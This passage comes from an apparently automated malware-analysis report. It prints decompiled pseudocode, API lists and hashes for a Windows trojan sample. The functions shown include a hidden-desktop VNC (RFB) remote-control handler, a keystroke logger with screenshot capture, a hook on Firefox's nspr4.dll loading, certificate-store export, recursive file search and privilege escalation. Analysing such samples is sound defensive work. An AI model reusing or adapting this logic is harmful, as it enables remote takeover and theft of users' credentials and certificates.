    								if(_t288 == 0) {
    									_t289 = E0041941C(_t414, _t376, 1, 0x1b7740);
    									__eflags = _t289;
    									if(_t289 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v32);
    									_t291 = 2;
    									_t292 = E004193D4(_t291, _t376);
    									__eflags = _t292;
    									if(_t292 == 0) {
    										goto L104;
    									}
    									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
    									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
    									 *(_t505 + 0x48) = _t296;
    									__eflags = _t296;
    									if(_t296 == 0) {
    										L89:
    										_t297 =  *(_t505 + 0x4c);
    										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
    										 *(_t505 + 0x50) = _t490;
    										__eflags = _t297 - 5;
    										if(_t297 != 5) {
    											E00416421( *(_t505 + 0x1c));
    											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    										}
    										goto L90;
    									}
    									_t378 = (_t296 & 0x0000ffff) << 2;
    									_t161 = _t505 + 0x44; // 0x44
    									_t517 = _t161;
    									_t301 = E004163AC((_t296 & 0x0000ffff) << 2, _t517);
    									__eflags = _t301;
    									if(_t301 == 0) {
    										goto L104;
    									}
    									_t303 = E004193D4(_t378, _a4,  *_t517, 0x1b7740);
    									__eflags = _t303;
    									if(_t303 == 0) {
    										goto L104;
    									}
    									_v28 = _v28 & 0x00000000;
    									__eflags = 0 -  *(_t505 + 0x48);
    									if(0 >=  *(_t505 + 0x48)) {
    										goto L89;
    									}
    									_t305 =  *_t517;
    									do {
    										_t491 = _v28 & 0x0000ffff;
    										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
    										_t305 =  *((intOrPtr*)(_t505 + 0x44));
    										_t426 = 5;
    										__eflags =  *(_t305 + _t491 * 4) - _t426;
    										if( *(_t305 + _t491 * 4) == _t426) {
    											 *(_t505 + 0x4c) = _t426;
    										}
    										_v28 = _v28 + 1;
    										__eflags = _v28 -  *(_t505 + 0x48);
    									} while (_v28 <  *(_t505 + 0x48));
    									goto L89;
    								}
    								_t309 = _t288 - 1;
    								__eflags = _t309;
    								if(_t309 == 0) {
    									_push(0x1b7740);
    									_push( &_v56);
    									_t311 = 9;
    									_t312 = E004193D4(_t311, _t376);
    									__eflags = _t312;
    									if(_t312 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0x33], 0x8");
    									asm("rol word [ebp-0x31], 0x8");
    									asm("rol word [ebp-0x2f], 0x8");
    									asm("rol word [ebp-0x2d], 0x8");
    									__eflags = _v56;
    									_t382 = 0;
    									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
    									__eflags = _v8;
    									if(_v8 <= 0) {
    										L76:
    										__eflags = _t382 - _v8;
    										if(_t382 != _v8) {
    											L78:
    											E0041645D(_t382 * 9 + _v20,  &_v56, 9);
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    											goto L35;
    										}
    										_v8 = _v8 + 1;
    										_t316 = E004163AC(_v8 * 9,  &_v20);
    										__eflags = _t316;
    										if(_t316 == 0) {
    											goto L104;
    										}
    										goto L78;
    									}
    									_t318 = _v20 + 7;
    									__eflags = _t318;
    									do {
    										__eflags =  *(_t318 - 2);
    										if( *(_t318 - 2) != 0) {
    											goto L75;
    										}
    										__eflags =  *_t318;
    										if( *_t318 == 0) {
    											goto L76;
    										}
    										L75:
    										_t382 = _t382 + 1;
    										_t318 = _t318 + 9;
    										__eflags = _t382 - _v8;
    									} while (_t382 < _v8);
    									goto L76;
    								}
    								_t319 = _t309 - 1;
    								__eflags = _t319;
    								if(_t319 == 0) {
    									_push(0x1b7740);
    									_push( &_v112);
    									_t321 = 7;
    									_t322 = E004193D4(_t321, _t376);
    									__eflags = _t322;
    									if(_t322 == 0) {
    										goto L104;
    									}
    									__eflags = _v112;
    									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
    									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
    									continue;
    								}
    								_t329 = _t319 - 1;
    								__eflags = _t329;
    								if(_t329 == 0) {
    									_push(0x1b7740);
    									_push( &_v16);
    									_t331 = 5;
    									_t332 = E004193D4(_t331, _t376);
    									__eflags = _t332;
    									if(_t332 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0xb], 0x8");
    									asm("rol word [ebp-0x9], 0x8");
    									_v24 = _v24 & 0x00000000;
    									_t525 = 0x8000;
    									_t333 = GetSystemMetrics(0x17);
    									__eflags = _t333;
    									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
    									__eflags = _v15 - _v43;
    									if(_v15 != _v43) {
    										L50:
    										_t525 = 0x8001;
    										L51:
    										_t335 = _v44;
    										_t442 = _v16 & 0x00000001;
    										__eflags = _t442 - (_t335 & 0x00000001);
    										if(_t442 != (_t335 & 0x00000001)) {
    											__eflags = _t442;
    											if(_t442 == 0) {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    												__eflags = _t461;
    											} else {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    											}
    											_t525 = _t525 | _t461;
    											__eflags = _t525;
    										}
    										_t444 = _v16 & 0x00000004;
    										__eflags = _t444 - (_t335 & 0x00000004);
    										if(_t444 != (_t335 & 0x00000004)) {
    											__eflags = _t444;
    											if(_t444 == 0) {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    												__eflags = _t452;
    											} else {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    											}
    											_t525 = _t525 | _t452;
    											__eflags = _t525;
    										}
    										_t446 = _v16 & 0x00000002;
    										__eflags = _t446 - (_t335 & 0x00000002);
    										if(_t446 != (_t335 & 0x00000002)) {
    											__eflags = _t446;
    											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    											__eflags = _t525;
    										}
    										__eflags = _v16 & 0x00000008;
    										if((_v16 & 0x00000008) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0x78;
    										}
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0xffffff88;
    										}
    										E0041645D( &_v44,  &_v16, 5);
    										_t490 = _t525;
    										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
    										continue;
    									}
    									__eflags = _v13 - _v41;
    									if(_v13 == _v41) {
    										goto L51;
    									}
    									goto L50;
    								}
    								__eflags = _t329 != 1;
    								if(_t329 != 1) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v116);
    								_t352 = 3;
    								_t353 = E004193D4(_t352, _t376);
    								__eflags = _t353;
    								if(_t353 == 0) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v64);
    								_t355 = 4;
    								_t356 = E004193D4(_t355, _t376);
    								__eflags = _t356;
    								if(_t356 == 0) {
    									goto L104;
    								}
    								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
    								_t389 = E004163F1(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
    								__eflags = _t389;
    								if(_t389 == 0) {
    									E00416421(0);
    									goto L104;
    								}
    								_t366 = E004193D4(_v64, _a4, _t389, 0x1b7740);
    								__eflags = _t366;
    								if(_t366 == 0) {
    									goto L104;
    								}
    								_t490 = _v64;
    								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
    								E00416421(_t389);
    							}
    							_t300 = E004163F1(0x400);
    							 *(_t505 + 0x1c) = _t300;
    							__eflags = _t300;
    						} while (_t300 != 0);
    						goto L104;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041944B: send.WS2_32(?,?,?,00000000), ref: 00419459
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,?,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0040B0F1
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B10C
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B19E
    • GetSystemMetrics.USER32 ref: 0040B2B8
      • Part of subcall function 004193D4: recv.WS2_32(?,?,00000004,00000000), ref: 004193F8
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010), ref: 0040B644
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3911805420-914445781
    • Opcode ID: 4d892b7ac5429dfc5a9d26e8e41c457038575cd8fa9575927c649662359094b2
    • Instruction ID: edc5106e1785f27ff2afc4a9dee735c3b89bc1d66f1f7216970319086ace7fa5
    • Opcode Fuzzy Hash: 4d892b7ac5429dfc5a9d26e8e41c457038575cd8fa9575927c649662359094b2
    • Instruction Fuzzy Hash: F932DE31A00219AADF24DBA4C855BEEB7B5EF04344F04843AE956F72C2DB788E45C79D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405A43(void* __ecx, void* __eflags, WCHAR* _a4) {
    				char _v5;
    				struct HWINSTA__* _v12;
    				struct HWINSTA__* _v16;
    				char _v32;
    				char _v48;
    				void* __esi;
    				struct HWINSTA__* _t23;
    				WCHAR* _t28;
    				int _t35;
    				struct HWINSTA__* _t41;
    				void* _t43;
    				WCHAR* _t45;
    				struct HDESK__* _t46;
    
    				_t43 = __ecx;
    				_t45 =  &_v32;
    				_v5 = 0;
    				E004159A4(0xcc, _t45);
    				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
    				_v12 = _t23;
    				if(_t23 != 0) {
    					L2:
    					_v16 = GetProcessWindowStation();
    					if(E00405A1B(_t50, _v12) == 0) {
    						L13:
    						CloseWindowStation(_v12);
    						L14:
    						return _v5;
    					}
    					_t28 = _a4;
    					_a4 = _t28;
    					if(_t28 == 0) {
    						_t37 =  &_v48;
    						_a4 =  &_v48;
    						E004159A4(0xcd, _t37);
    					}
    					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
    					if(_t46 != 0) {
    						L7:
    						if(E004059D6(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
    							L9:
    							_v5 = 1;
    							L10:
    							CloseDesktop(_t46);
    							if(_v5 != 0) {
    								goto L13;
    							}
    							goto L11;
    						}
    						_t35 = SetThreadDesktop(_t46);
    						_v5 = 0;
    						if(_t35 == 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
    						_t54 = _t46;
    						if(_t46 == 0) {
    							L11:
    							_t58 = _v16;
    							if(_v16 != 0) {
    								E00405A1B(_t58, _v16);
    							}
    							goto L13;
    						}
    						goto L7;
    					}
    				}
    				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
    				_v12 = _t41;
    				_t50 = _t41;
    				if(_t41 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}

    APIs
    • OpenWindowStationW.USER32 ref: 00405A68
    • CreateWindowStationW.USER32 ref: 00405A7B
    • GetProcessWindowStation.USER32 ref: 00405A8C
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00405AC7
    • CreateDesktopW.USER32 ref: 00405ADB
    • GetCurrentThreadId.KERNEL32 ref: 00405AE7
    • GetThreadDesktop.USER32(00000000), ref: 00405AEE
    • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00405B00
    • CloseDesktop.USER32(00000000,00000000,00000000), ref: 00405B12
    • CloseWindowStation.USER32(?,?), ref: 00405B2D
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID:
    • API String ID: 2917431391-0
    • Opcode ID: e132bd08d8e76af3339f7f4f40a444f57ee3938c04d21d5ed9b7b0a744be2f12
    • Instruction ID: 739a9b8b45f5e9f40246e24c91d162f022398147c84233ab2b59d88c80c59f2b
    • Opcode Fuzzy Hash: e132bd08d8e76af3339f7f4f40a444f57ee3938c04d21d5ed9b7b0a744be2f12
    • Instruction Fuzzy Hash: E12178B1900648BFDF10ABA59C88D9F7EB8EB48394B04817AF801F3261D2399D45CE78
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041618F(MSG* _a4) {
    				char _v524;
    				char _v780;
    				char _v840;
    				char _v864;
    				short _v884;
    				intOrPtr* _v888;
    				intOrPtr _v900;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t27;
    				signed int _t32;
    				void* _t36;
    				intOrPtr _t39;
    				WCHAR* _t45;
    				MSG* _t54;
    				WCHAR* _t65;
    				intOrPtr* _t66;
    				signed int _t67;
    				void* _t69;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x374;
    				_t54 = _a4;
    				if(_t54 == 0 || E004068C0() == 0) {
    					L20:
    					return TranslateMessage(_t54);
    				} else {
    					_t25 = _t54->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 != 0x100) {
    							goto L20;
    						}
    						__eflags = _t54->wParam - 0x1b;
    						if(_t54->wParam == 0x1b) {
    							goto L20;
    						}
    						_t27 = GetKeyboardState( &_v780);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L20;
    						}
    						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    						__eflags = _t32;
    						if(_t32 <= 0) {
    							goto L20;
    						}
    						__eflags = _t32 - 1;
    						if(__eflags != 0) {
    							if(__eflags > 0) {
    								L18:
    								__eflags = 0;
    								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
    								_push( &_v884);
    								L19:
    								E00415FF2();
    								goto L20;
    							}
    							L17:
    							__eflags = _v884 - 0x20;
    							if(_v884 < 0x20) {
    								goto L20;
    							}
    							goto L18;
    						}
    						__eflags = _t54->wParam - 8;
    						if(_t54->wParam != 8) {
    							goto L17;
    						}
    						_push(0x4048ac);
    						goto L19;
    					}
    					EnterCriticalSection(0x423148);
    					if( *0x423140 > 0) {
    						 *0x423140 =  *0x423140 + 0xffff;
    						_t36 = 2;
    						E004159A4(_t36,  &_v864);
    						_t39 = E0040F20F( &_v864, 0x1e, 0x1f4);
    						_v900 = _t39;
    						if(_t39 != 0) {
    							E004159A4(0,  &_v840);
    							_t65 =  &_v884;
    							E004159A4(1, _t65);
    							_t45 =  *0x423138;
    							if(_t45 != 0) {
    								_t65 = _t45;
    							}
    							E00417114( &_v840, 0x104,  &_v524,  &_v840);
    							_t66 = _v888;
    							E004057E9(0x104, _t66,  &_v524);
    							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x422bb0, GetTickCount());
    						}
    					}
    					LeaveCriticalSection(0x423148);
    					goto L20;
    				}
    			}

    APIs
    • TranslateMessage.USER32(?), ref: 004162E6
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • EnterCriticalSection.KERNEL32(00423148), ref: 004161C9
    • LeaveCriticalSection.KERNEL32(00423148), ref: 0041626C
      • Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040F241
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040F252
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 0040F25F
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 0040F26C
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0040F279
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 0040F286
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 0040F293
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 0040F2A0
      • Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(ole32.dll), ref: 0040F2E8
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040F2F3
      • Part of subcall function 0040F20F: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040F305
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040F310
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040F31C
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040F329
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040F336
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040F343
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040F350
      • Part of subcall function 0040F20F: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040F35D
    • GetTickCount.KERNEL32 ref: 0041622E
    • GetKeyboardState.USER32(?), ref: 00416286
    • ToUnicode.USER32 ref: 004162AE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
    • String ID:
    • API String ID: 2762424063-3916222277
    • Opcode ID: 68a89a1532fdb861f9ce505db7757530dc63daebb5dd93b2d9139a78137cd745
    • Instruction ID: 25cc6646fa3b7964fae8e23ff5c2ce21956ef4716a97fc04752330741e403ae2
    • Opcode Fuzzy Hash: 68a89a1532fdb861f9ce505db7757530dc63daebb5dd93b2d9139a78137cd745
    • Instruction Fuzzy Hash: AB31E0326003019BDB20AFA5DC49AEB77A8AF44354F04487BF914EB191E739C984C7AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00412425(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				void* __edi;
    				void* _t12;
    				long _t13;
    				void* _t16;
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				UNICODE_STRING* _t24;
    				void* _t28;
    				HMODULE* _t29;
    				struct _OBJDIR_INFORMATION _t31;
    
    				if(E004068C0() != 0) {
    					_t29 = _a16;
    					_t24 = _a12;
    					_t12 =  *0x422974(_a4, 0, _t24, _t29, _t23, _t28, _t17);
    					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
    					_a4 = _t13;
    					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
    						EnterCriticalSection(0x4230fc);
    						if(( *0x423114 & 0x00000001) == 0) {
    							_t31 =  *_t29;
    							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
    								_t16 = 0;
    							} else {
    								_t16 = E00409AF5(_t21, _t22, _t31);
    							}
    							if(_t16 != 0) {
    								 *0x423114 =  *0x423114 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x4230fc);
    					}
    					return _a4;
    				}
    				goto ( *0x422970);
    			}

    APIs
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00412448
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 00412458
    • EnterCriticalSection.KERNEL32(004230FC), ref: 0041247C
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00412496
    • LeaveCriticalSection.KERNEL32(004230FC), ref: 004124B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
    • String ID: @xw$nspr4.dll
    • API String ID: 2984399785-1669710511
    • Opcode ID: f282968c9997229927802696484d7bc45f9fa5496869b87095130ca62136edc4
    • Instruction ID: 443c47b78df71ffe60bbbcd779b3dc73fc8c52b75bf82f32d4d440a8bd1fbcd2
    • Opcode Fuzzy Hash: f282968c9997229927802696484d7bc45f9fa5496869b87095130ca62136edc4
    • Instruction Fuzzy Hash: 5211C131200214EBCB205F51EE44BE77B78FF45755F004066FD45A7221CBBD9DA28AAD
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,004033D0), ref: 0040C0CD
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C0E9
    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040C0F5
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C134
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C164
    • CharLowerW.USER32(?,?,00000000,00000001), ref: 0040C182
    • GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0040C18D
    • CertCloseStore.CRYPT32(?,00000000), ref: 0040C216
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: b58316b79dbcadeb8b0cc32fa38720b70a04efa3c78de1c5f8aa53c5e9c31584
    • Instruction ID: de6a937b33ce2f0b4ea77f33d40ecacfefb81dbb74e049520a5b01d07cd62254
    • Opcode Fuzzy Hash: b58316b79dbcadeb8b0cc32fa38720b70a04efa3c78de1c5f8aa53c5e9c31584
    • Instruction Fuzzy Hash: 2B418671508341EBD7119F95DC81AAFBBDCEB88744F000A3FB994F21A1D638D9498766
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0041BB58(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				intOrPtr _v1120;
    				intOrPtr _v1124;
    				void* _v1128;
    				int _t51;
    				signed int _t60;
    				long _t68;
    				signed char _t71;
    				signed int _t83;
    
    				_v1120 = __edx;
    				_v1124 = __ecx;
    				_t51 = E0041BCB4("*",  &_v524, __ecx);
    				if(_t51 == 0) {
    					L25:
    					return _t51;
    				}
    				_t51 = FindFirstFileW( &_v524,  &_v1116);
    				_v1128 = _t51;
    				if(_t51 != 0xffffffff) {
    					_t71 = _a8;
    					while(1) {
    						_t83 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(E0041B8B4( &(_v1116.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v1128,  &_v1116) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t60 = _v1116.dwFileAttributes & 0x00000010;
    						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
    							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t83) {
    								L17:
    								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0041BCB4( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
    									_t103 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									E0041BB58( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
    								_t83 = _t83 + 1;
    								if(_t83 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t68 = _a12(_a16);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					_t51 = FindClose(_v1128);
    				}
    			}

    APIs
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
    • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
    • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0041BC35
    • Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
    • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
    • FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
    • String ID:
    • API String ID: 2348139788-0
    • Opcode ID: 162b816ae40fff88f59789b468e01d4d31f6b4f974f153e0717fcae5b64ac91a
    • Instruction ID: f7fa20dad1014f0554ede9088ea338ae8c2f9cf2e53501d052d845fba7f2c1e9
    • Opcode Fuzzy Hash: 162b816ae40fff88f59789b468e01d4d31f6b4f974f153e0717fcae5b64ac91a
    • Instruction Fuzzy Hash: 24415D310082099BCB21DF15DD48ADF7BA5EF84344F00492EF994922A1EB39D996CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417AED(WCHAR* _a4) {
    				void* _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t23;
    
    				_t23 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
    						_t23 = 1;
    					}
    					CloseHandle(_v12);
    					return _t23;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 00417AFD
    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
    • OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16
